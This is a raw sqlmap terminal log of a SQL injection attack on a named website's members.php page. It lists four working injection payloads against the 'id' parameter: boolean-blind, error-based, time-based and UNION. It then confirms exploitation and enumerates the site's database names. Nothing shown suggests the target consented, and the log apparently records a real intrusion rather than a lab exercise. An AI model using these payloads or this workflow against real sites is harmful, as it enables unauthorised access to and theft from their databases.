        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.7#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:37:56 /2021-12-02/

[?1049h[22;0;0t[1;43r(B[m[4l[?7h[43;1H[?1049l[23;0;0t[?1l>[14:37:56] [INFO] using 'STDIN' for parsing targets list
URL 1:
GET http://www.asfaa.org/members.php?id=1
do you want to test this URL? [Y/n/q]
> Y
[14:37:56] [INFO] testing URL 'http://www.asfaa.org/members.php?id=1'
[14:37:56] [INFO] resuming back-end DBMS 'mysql' 
[14:37:56] [INFO] using '/home/capt/.sqlmap/output/results-12022021_0237pm.csv' as the CSV results file in multiple targets mode
[14:37:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7933=7933

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: id=(SELECT 9302 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(9302=9302,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2 AND (SELECT 8848 FROM (SELECT(SLEEP(5)))kfaV)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-8807 UNION ALL SELECT NULL,CONCAT(0x7171767671,0x5463456666494f50514771416f414e62654d544e456255564c5a51494167445a794978627561724b,0x7170716b71),NULL,NULL-- -
---
do you want to exploit this SQL injection? [Y/n] Y
[14:37:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.11, Apache 2.4.51
back-end DBMS: MySQL >= 5.0 (Percona fork)
[14:37:57] [INFO] fetching database names
[14:37:58] [INFO] resumed: 'information_schema'
[14:37:58] [INFO] resumed: 'db83231_acolop'
[14:37:58] [INFO] resumed: 'db83231_asfaa'
available databases [3]:
[*] db83231_acolop
[*] db83231_asfaa
[*] information_schema

[14:37:58] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/capt/.sqlmap/output/results-12022021_0237pm.csv'

[*] ending @ 14:37:58 /2021-12-02/

